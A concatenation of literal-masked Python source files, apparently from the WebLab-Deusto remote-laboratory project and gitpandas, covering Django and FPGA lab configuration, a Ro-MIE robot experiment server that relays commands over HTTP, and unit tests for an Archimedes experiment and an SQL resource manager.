<s> from gitpandas . utilities . plotting import plot_cumulative_blame <EOL> from gitpandas import GitHubProfile , ProjectDirectory <EOL> __author__ = '<STR_LIT>' <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> g = ProjectDirectory ( working_dir = [ '<STR_LIT>' ] ) <EOL> blame = g . cumulative_blame ( branch = '<STR_LIT>' , extensions = [ '<STR_LIT>' , '<STR_LIT:html>' , '<STR_LIT>' , '<STR_LIT>' ] , by = '<STR_LIT>' , limit = None , skip = None ) <EOL> plot_cumulative_blame ( blame ) </s>
<s> DEBUG = True <EOL> TEMPLATE_DEBUG = DEBUG <EOL> ADMINS = ( <EOL> ) <EOL> MANAGERS = ADMINS <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> ALLOWED_HOSTS = [ ] <EOL> TIME_ZONE = '<STR_LIT>' <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> SITE_ID = <NUM_LIT:1> <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> MEDIA_ROOT = '<STR_LIT>' <EOL> MEDIA_URL = '<STR_LIT>' <EOL> STATIC_ROOT = '<STR_LIT>' <EOL> STATIC_URL = '<STR_LIT>' <EOL> STATICFILES_DIRS = ( <EOL> ) <EOL> STATICFILES_FINDERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> TEMPLATE_DIRS = ( <EOL> ) <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> LOGGING = { <EOL> '<STR_LIT:version>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT:class>' : '<STR_LIT>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> } <EOL> } </s>
<s> xilinx_board_type = '<STR_LIT>' <EOL> weblab_xilinx_experiment_port_number = <NUM_LIT:1> <EOL> xilinx_home = "<STR_LIT:.>" <EOL> xilinx_impact_full_path = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> xilinx_programmer_type = '<STR_LIT>' <EOL> xilinx_device_to_send_commands = '<STR_LIT>' <EOL> xilinx_jtag_blazer_jbmanager_svf2jsvf_full_path = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> xilinx_jtag_blazer_jbmanager_target_full_path = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> xilinx_jtag_blazer_device_ip_PLD = "<STR_LIT>" <EOL> xilinx_http_device_ip_PLD = "<STR_LIT>" <EOL> xilinx_http_device_port_PLD = <NUM_LIT> <EOL> xilinx_http_device_app_PLD = "<STR_LIT>" <EOL> xilinx_batch_content_PLD = """<STR_LIT>""" <EOL> pld_webcam_url = '''<STR_LIT>''' </s>
# Registry of the experiment instances served by this laboratory server.
# Each key is an experiment-instance identifier; each value holds (at least)
# the coordination address of the experiment server and a tuple of checkers.
# All keys and values are masked in this corpus; two entries additionally set
# a boolean flag to True (presumably "manages_polling" or similar — masked,
# confirm against the laboratory server documentation).
laboratory_assigned_experiments = {
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': (),},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': (),},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': (),},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': (),},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    # Entry with an extra boolean flag set (masked key).
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': (), '<STR_LIT>': True,},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': ()},
    # Entry with an extra boolean flag set (masked key).
    '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': (), '<STR_LIT>': True,},
}
# Configuration constants for the Xilinx FPGA experiment server.
# Values are masked in this corpus; names are the configuration contract.

# Working directory for the Xilinx toolchain ("." placeholder).
xilinx_home = "<STR_LIT:.>"
# Command line (program + argument list) for the iMPACT programmer.
xilinx_impact_full_path = [ "<STR_LIT>" , "<STR_LIT>" ]
# Batch script content used to program the FPGA (multi-line, masked).
xilinx_batch_content_FPGA = """<STR_LIT>"""
# Target device type for this experiment — masked.
weblab_xilinx_experiment_xilinx_device = '<STR_LIT>'
# Port number used by the Xilinx experiment (masked numeric literal).
weblab_xilinx_experiment_port_number = <NUM_LIT:1>
import weblab.experiment.experiment as Experiment

from voodoo.override import Override
from voodoo.log import logged

import json
import urllib2


class RoMIEBlocklyExperiment(Experiment.Experiment):
    """WebLab experiment server that drives the Ro-MIE robot over HTTP.

    Commands arrive as JSON; each recognised command type triggers a GET
    request against the robot's HTTP endpoint (base URL taken from the
    configuration manager) and the raw response is relayed back to the
    client as JSON. Python 2 code (print statements, urllib2).
    """

    def __init__(self, coord_address, locator, cfg_manager, *args, **kwargs):
        super(RoMIEBlocklyExperiment, self).__init__(*args, **kwargs)
        # Configuration manager is kept to read the debug flag and the
        # robot's base URL at command time.
        self._cfg_manager = cfg_manager
        self.read_base_config()

    def read_base_config(self):
        """<STR_LIT>"""
        # Intentionally a no-op placeholder for subclass/base configuration.
        pass

    @Override(Experiment.Experiment)
    @logged("<STR_LIT:info>")
    def do_get_api(self):
        # Declares the experiment API version expected by the core server.
        return "<STR_LIT:2>"

    @Override(Experiment.Experiment)
    @logged("<STR_LIT:info>")
    def do_start_experiment(self, client_initial_data, server_initial_data):
        """<STR_LIT>"""
        # Optional debug trace, controlled by a (masked) config flag.
        if (self._cfg_manager.get_value('<STR_LIT>')):
            print "<STR_LIT>"
        # Echo the client's initial data back, wrapped in JSON.
        return json.dumps({"<STR_LIT>": client_initial_data})

    @Override(Experiment.Experiment)
    @logged("<STR_LIT:info>")
    def do_send_command_to_device(self, command):
        """<STR_LIT>"""
        if (self._cfg_manager.get_value('<STR_LIT>')):
            print "<STR_LIT>" % command
        # The command is a JSON object; its (masked) type field selects the
        # HTTP path suffix sent to the robot. Unknown types return an error
        # string without touching the device.
        command = json.loads(command)
        response = None
        tag = None
        if command['<STR_LIT>'] == '<STR_LIT:F>':
            # 'F' command: blocking GET with a timeout; when the (masked)
            # marker appears in the response, a tag is sliced out of it and
            # its separators normalised (space -> ':').
            response = urllib2.urlopen(self._cfg_manager.get_value('<STR_LIT>') + '<STR_LIT:f>', timeout = <NUM_LIT>).read()
            if '<STR_LIT>' in response:
                tag = response[<NUM_LIT:5>:<NUM_LIT>].replace('<STR_LIT:U+0020>', '<STR_LIT::>')
        elif command['<STR_LIT>'] == '<STR_LIT:L>':
            response = urllib2.urlopen(self._cfg_manager.get_value('<STR_LIT>') + '<STR_LIT:l>', timeout = <NUM_LIT>).read()
        elif command['<STR_LIT>'] == '<STR_LIT:R>':
            response = urllib2.urlopen(self._cfg_manager.get_value('<STR_LIT>') + '<STR_LIT:r>', timeout = <NUM_LIT>).read()
        elif command['<STR_LIT>'] == '<STR_LIT:S>':
            # 'S' command: the textual response is collapsed into a boolean
            # depending on which (masked) markers it contains.
            response = urllib2.urlopen(self._cfg_manager.get_value('<STR_LIT>') + '<STR_LIT:s>', timeout = <NUM_LIT>).read()
            if '<STR_LIT>' in response and '<STR_LIT:0>' in response:
                response = False
            elif '<STR_LIT>' in response and '<STR_LIT:1>' in response:
                response = True
        else:
            # Unrecognised command type.
            return "<STR_LIT>"
        # NOTE(review): a response of False (from the 'S' branch) is still
        # serialised here because the check is "is not None", not truthiness.
        if response is not None:
            return json.dumps({"<STR_LIT>": response, "<STR_LIT>": tag})
        return "<STR_LIT>"

    @Override(Experiment.Experiment)
    @logged("<STR_LIT:info>")
    def do_dispose(self):
        """<STR_LIT>"""
        if (self._cfg_manager.get_value('<STR_LIT>')):
            print "<STR_LIT>"
        return "<STR_LIT:OK>"
from __future__ import print_function, unicode_literals

# Laboratory server configuration: the two experiment instances this
# laboratory serves. Each entry maps a (masked) experiment-instance
# identifier to its coordination address and an empty tuple of checkers.
laboratory_assigned_experiments = {
    '<STR_LIT>': {
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': ()
    },
    '<STR_LIT>': {
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': ()
    },
}
<s> from __future__ import print_function , unicode_literals <EOL> import base64 <EOL> import json <EOL> import unittest <EOL> import threading <EOL> import time <EOL> from mock import patch , PropertyMock , MagicMock <EOL> from experiments . archimedes import Archimedes <EOL> from voodoo . configuration import ConfigurationManager <EOL> from voodoo . sessions . session_id import SessionId <EOL> class TestArchimedes ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . cfg_manager = ConfigurationManager ( ) <EOL> self . cfg_manager . _set_value ( "<STR_LIT>" , False ) <EOL> self . cfg_manager . _set_value ( "<STR_LIT>" , { "<STR_LIT:default>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . experiment = Archimedes ( None , None , self . cfg_manager ) <EOL> self . lab_session_id = SessionId ( '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> self . experiment . do_dispose ( ) <EOL> def test_start ( self ) : <EOL> m = MagicMock ( return_value = "<STR_LIT>" ) <EOL> self . experiment . _send = m <EOL> start = self . experiment . do_start_experiment ( "<STR_LIT:{}>" , "<STR_LIT:{}>" ) <EOL> assert m . mock_calls [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] == "<STR_LIT>" <EOL> assert m . mock_calls [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] == "<STR_LIT>" <EOL> def test_unknown_instance ( self ) : <EOL> """<STR_LIT>""" <EOL> self . cfg_manager = ConfigurationManager ( ) <EOL> self . cfg_manager . _set_value ( "<STR_LIT>" , { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } ) <EOL> self . experiment = Archimedes ( None , None , self . cfg_manager ) <EOL> start = self . experiment . do_start_experiment ( "<STR_LIT:{}>" , "<STR_LIT:{}>" ) <EOL> up_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> assert up_resp . startswith ( "<STR_LIT>" ) <EOL> up_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> assert up_resp . 
startswith ( "<STR_LIT>" ) <EOL> def test_control_ball_commands ( self ) : <EOL> start = self . experiment . do_start_experiment ( "<STR_LIT:{}>" , "<STR_LIT:{}>" ) <EOL> up_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> down_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> slow_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> def test_basic_data_commands ( self ) : <EOL> start = self . experiment . do_start_experiment ( "<STR_LIT:{}>" , "<STR_LIT:{}>" ) <EOL> level_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> assert float ( level_resp ) == <NUM_LIT> <EOL> load_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> assert float ( load_resp ) == <NUM_LIT> <EOL> def test_advanced_data_commands ( self ) : <EOL> start = self . experiment . do_start_experiment ( "<STR_LIT:{}>" , "<STR_LIT:{}>" ) <EOL> image_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> dec = base64 . b64decode ( image_resp ) <EOL> assert len ( dec ) > <NUM_LIT:100> <EOL> plot_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> f = file ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> f . write ( """<STR_LIT>""" % ( image_resp ) <EOL> ) <EOL> f . close ( ) <EOL> def test_explicit_instance_commands ( self ) : <EOL> """<STR_LIT>""" <EOL> start = self . experiment . do_start_experiment ( "<STR_LIT:{}>" , "<STR_LIT:{}>" ) <EOL> up_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> down_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> slow_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> level_resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> assert float ( level_resp ) == <NUM_LIT> <EOL> load_resp = self . experiment . 
do_send_command_to_device ( "<STR_LIT>" ) <EOL> assert float ( load_resp ) == <NUM_LIT> <EOL> def test_allinfo_command ( self ) : <EOL> start = self . experiment . do_start_experiment ( "<STR_LIT:{}>" , "<STR_LIT:{}>" ) <EOL> resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> r = json . loads ( resp ) <EOL> assert float ( r [ "<STR_LIT:default>" ] [ "<STR_LIT>" ] ) == <NUM_LIT> <EOL> assert float ( r [ "<STR_LIT:default>" ] [ "<STR_LIT>" ] ) == <NUM_LIT> <EOL> def test_allinfo_command_multiple ( self ) : <EOL> start = self . experiment . do_start_experiment ( "<STR_LIT:{}>" , "<STR_LIT:{}>" ) <EOL> resp = self . experiment . do_send_command_to_device ( "<STR_LIT>" ) <EOL> r = json . loads ( resp ) <EOL> assert float ( r [ "<STR_LIT:default>" ] [ "<STR_LIT>" ] ) == <NUM_LIT> <EOL> assert float ( r [ "<STR_LIT:default>" ] [ "<STR_LIT>" ] ) == <NUM_LIT> <EOL> assert float ( r [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) == <NUM_LIT> <EOL> assert float ( r [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) == <NUM_LIT> <EOL> def suite ( ) : <EOL> return unittest . TestSuite ( <EOL> ( <EOL> unittest . makeSuite ( TestArchimedes ) <EOL> ) <EOL> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
from __future__ import print_function, unicode_literals

import unittest

import test.unit.configuration as configuration_module
import voodoo.configuration as ConfigurationManager

from weblab.data.experiments import ExperimentInstanceId
from weblab.data.experiments import ExperimentId
from weblab.core.coordinator.resource import Resource
from weblab.core.coordinator.sql.coordinator import Coordinator
import weblab.core.coordinator.sql.resource_manager as ResourcesManager
import weblab.core.coordinator.sql.db as CoordinationDatabaseManager
import weblab.core.coordinator.sql.model as CoordinatorModel
import weblab.core.coordinator.exc as CoordExc


class ResourcesManagerTestCase(unittest.TestCase):
    """Integration-style tests for the SQL-backed ResourcesManager.

    Each test opens a session from the coordination database, mutates
    resources/experiment instances through the manager, commits, and
    verifies the resulting rows via the CoordinatorModel ORM classes.
    All identifiers are masked in this corpus.
    """

    def setUp(self):
        # Build a real coordinator against the test configuration, wipe any
        # state it left behind, and keep only its session maker for direct
        # database access through a fresh (cleaned) ResourcesManager.
        self.cfg_manager = ConfigurationManager.ConfigurationManager()
        self.cfg_manager.append_module(configuration_module)
        self.coordinator = Coordinator(None, self.cfg_manager)
        self.coordinator._clean()
        self.coordinator.stop()
        coordination_database = CoordinationDatabaseManager.CoordinationDatabaseManager(self.cfg_manager)
        self.session_maker = coordination_database.session_maker
        self.resources_manager = ResourcesManager.ResourcesManager(self.session_maker)
        self.resources_manager._clean()

    def test_add_resource(self):
        # Adding the same resource twice (in two sessions) must be
        # idempotent: the state checked by _check_resource_added holds
        # after both calls.
        session = self.session_maker()
        try:
            resource_types = session.query(CoordinatorModel.ResourceType).all()
            self.assertEquals(<NUM_LIT:0>, len(resource_types), "<STR_LIT>")
            self.resources_manager.add_resource(session, Resource("<STR_LIT:type>", "<STR_LIT>"))
            self._check_resource_added(session)
            session.commit()
        finally:
            session.close()
        session = self.session_maker()
        try:
            self.resources_manager.add_resource(session, Resource("<STR_LIT:type>", "<STR_LIT>"))
            self._check_resource_added(session)
            session.commit()
        finally:
            session.close()

    def _check_resource_added(self, session):
        # Helper: exactly one resource type with one instance exists, the
        # back-references are consistent, and the instance owns a slot.
        resource_types = session.query(CoordinatorModel.ResourceType).all()
        self.assertEquals(<NUM_LIT:1>, len(resource_types))
        resource_type = resource_types[<NUM_LIT:0>]
        self.assertEquals("<STR_LIT:type>", resource_type.name)
        resource_instances = resource_type.instances
        self.assertEquals(<NUM_LIT:1>, len(resource_instances))
        resource_instance = resource_instances[<NUM_LIT:0>]
        self.assertEquals("<STR_LIT>", resource_instance.name)
        self.assertEquals(resource_type, resource_instance.resource_type)
        slot = resource_instance.slot
        self.assertNotEquals(None, slot)
        self.assertEquals(resource_instance, slot.resource_instance)

    def test_add_experiment_instance_id(self):
        # Registering an experiment instance also registers its resource;
        # the add happens outside the first session on purpose.
        session = self.session_maker()
        try:
            resource_types = session.query(CoordinatorModel.ResourceType).all()
            self.assertEquals(<NUM_LIT:0>, len(resource_types), "<STR_LIT>")
            exp_id = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
            session.commit()
        finally:
            session.close()
        self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id, Resource("<STR_LIT:type>", "<STR_LIT>"))
        session = self.session_maker()
        try:
            self._check_resource_added(session)
            self._check_experiment_instance_id_added(session)
            session.commit()
        finally:
            session.close()

    def test_add_experiment_instance_id_redundant(self):
        # A redundant identical registration is accepted, but registering
        # the same instance with a conflicting resource/laboratory raises
        # InvalidExperimentConfigError.
        session = self.session_maker()
        try:
            resource_types = session.query(CoordinatorModel.ResourceType).all()
            self.assertEquals(<NUM_LIT:0>, len(resource_types), "<STR_LIT>")
        finally:
            session.close()
        exp_id = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
        self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id, Resource("<STR_LIT:type>", "<STR_LIT>"))
        self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id, Resource("<STR_LIT:type>", "<STR_LIT>"))
        session = self.session_maker()
        try:
            self._check_resource_added(session)
            self._check_experiment_instance_id_added(session)
            self.assertRaises(CoordExc.InvalidExperimentConfigError,
                              self.resources_manager.add_experiment_instance_id,
                              "<STR_LIT>", exp_id, Resource("<STR_LIT:type>", "<STR_LIT>"))
            self.assertRaises(CoordExc.InvalidExperimentConfigError,
                              self.resources_manager.add_experiment_instance_id,
                              "<STR_LIT>", exp_id, Resource("<STR_LIT:type>", "<STR_LIT>"))
            session.commit()
        finally:
            session.close()

    def test_get_resource_instance_by_experiment_instance_id(self):
        # Lookup by experiment instance returns an equal Resource value.
        session = self.session_maker()
        try:
            exp_id = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
            self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id, Resource("<STR_LIT:type>", "<STR_LIT>"))
            session.commit()
        finally:
            session.close()
        resource = self.resources_manager.get_resource_instance_by_experiment_instance_id(exp_id)
        expected_resource = Resource("<STR_LIT:type>", "<STR_LIT>")
        self.assertEquals(expected_resource, resource)

    def test_get_resource_instance_by_experiment_instance_id_failing(self):
        # Unknown experiment type or unknown instance both raise
        # ExperimentNotFoundError.
        session = self.session_maker()
        try:
            exp_id = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
            self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id, Resource("<STR_LIT:type>", "<STR_LIT>"))
            session.commit()
        finally:
            session.close()
        exp_invalid_type = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
        self.assertRaises(CoordExc.ExperimentNotFoundError,
                          self.resources_manager.get_resource_instance_by_experiment_instance_id,
                          exp_invalid_type)
        exp_invalid_inst = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
        self.assertRaises(CoordExc.ExperimentNotFoundError,
                          self.resources_manager.get_resource_instance_by_experiment_instance_id,
                          exp_invalid_inst)

    def test_get_resource_types_by_experiment_id(self):
        # An experiment type maps to the single resource type it was
        # registered with.
        session = self.session_maker()
        try:
            exp_id = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
            self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id, Resource("<STR_LIT:type>", "<STR_LIT>"))
            session.commit()
        finally:
            session.close()
        exp_type_id = ExperimentId("<STR_LIT>", "<STR_LIT>")
        resource_types = self.resources_manager.get_resource_types_by_experiment_id(exp_type_id)
        self.assertEquals(<NUM_LIT:1>, len(resource_types))
        self.assertTrue(u"<STR_LIT:type>" in resource_types)

    def test_get_resource_types_by_experiment_id_error(self):
        # Asking for an unregistered experiment id raises
        # ExperimentNotFoundError.
        session = self.session_maker()
        try:
            exp_id = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
            self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id, Resource("<STR_LIT:type>", "<STR_LIT>"))
            session.commit()
        finally:
            session.close()
        self.assertRaises(
            CoordExc.ExperimentNotFoundError,
            self.resources_manager.get_resource_types_by_experiment_id,
            ExperimentId("<STR_LIT:foo>", "<STR_LIT:bar>")
        )

    def _check_experiment_instance_id_added(self, session):
        # Helper: exactly one experiment type with one instance exists, and
        # the experiment-type <-> resource-type association is bidirectional.
        experiment_types = session.query(CoordinatorModel.ExperimentType).all()
        self.assertEquals(<NUM_LIT:1>, len(experiment_types))
        experiment_type = experiment_types[<NUM_LIT:0>]
        self.assertEquals("<STR_LIT>", experiment_type.cat_name)
        self.assertEquals("<STR_LIT>", experiment_type.exp_name)
        experiment_instances = experiment_type.instances
        self.assertEquals(<NUM_LIT:1>, len(experiment_instances))
        experiment_instance = experiment_instances[<NUM_LIT:0>]
        self.assertEquals("<STR_LIT>", experiment_instance.experiment_instance_id)
        self.assertEquals(experiment_type, experiment_instance.experiment_type)
        resource_instance = experiment_instance.resource_instance
        self.assertEquals("<STR_LIT>", resource_instance.name)
        resource_type = resource_instance.resource_type
        self.assertTrue(resource_type in experiment_type.resource_types)
        self.assertTrue(experiment_type in resource_type.experiment_types)

    def test_remove_resource_instance_id(self):
        # Removing by experiment instance id deletes the experiment
        # instance row.
        session = self.session_maker()
        try:
            exp_id = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
            self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id, Resource("<STR_LIT:type>", "<STR_LIT>"))
            experiment_instances = session.query(CoordinatorModel.ExperimentInstance).all()
            self.assertEquals(<NUM_LIT:1>, len(experiment_instances))
            self.resources_manager.remove_resource_instance_id(session, exp_id)
            experiment_instances = session.query(CoordinatorModel.ExperimentInstance).all()
            self.assertEquals(<NUM_LIT:0>, len(experiment_instances))
            session.commit()
        finally:
            session.close()

    def test_remove_resource_instance(self):
        # Removing a resource instance cascades to the experiment
        # instances bound to it.
        session = self.session_maker()
        try:
            exp_id = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
            resource_instance = Resource("<STR_LIT:type>", "<STR_LIT>")
            self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id, resource_instance)
            experiment_instances = session.query(CoordinatorModel.ExperimentInstance).all()
            self.assertEquals(<NUM_LIT:1>, len(experiment_instances))
            resource_instances = session.query(CoordinatorModel.ResourceInstance).all()
            self.assertEquals(<NUM_LIT:1>, len(resource_instances))
            self.resources_manager.remove_resource_instance(session, resource_instance)
            resource_instances = session.query(CoordinatorModel.ResourceInstance).all()
            self.assertEquals(<NUM_LIT:0>, len(resource_instances))
            experiment_instances = session.query(CoordinatorModel.ExperimentInstance).all()
            self.assertEquals(<NUM_LIT:0>, len(experiment_instances))
            session.commit()
        finally:
            session.close()

    def test_list_resources(self):
        # Two different resource types registered -> both listed.
        session = self.session_maker()
        try:
            exp_id1 = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
            resource_instance1 = Resource("<STR_LIT>", "<STR_LIT>")
            self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id1, resource_instance1)
            exp_id2 = ExperimentInstanceId("<STR_LIT>", "<STR_LIT>", "<STR_LIT>")
            resource_instance2 = Resource("<STR_LIT>", "<STR_LIT>")
            self.resources_manager.add_experiment_instance_id("<STR_LIT>", exp_id2, resource_instance2)
            session.commit()
        finally:
            session.close()
        resources = self.resources_manager.list_resources()
        self.assertEquals(<NUM_LIT:2>, len(resources))
        self.assertTrue('<STR_LIT>' in resources)
        self.assertTrue('<STR_LIT>' in resources)

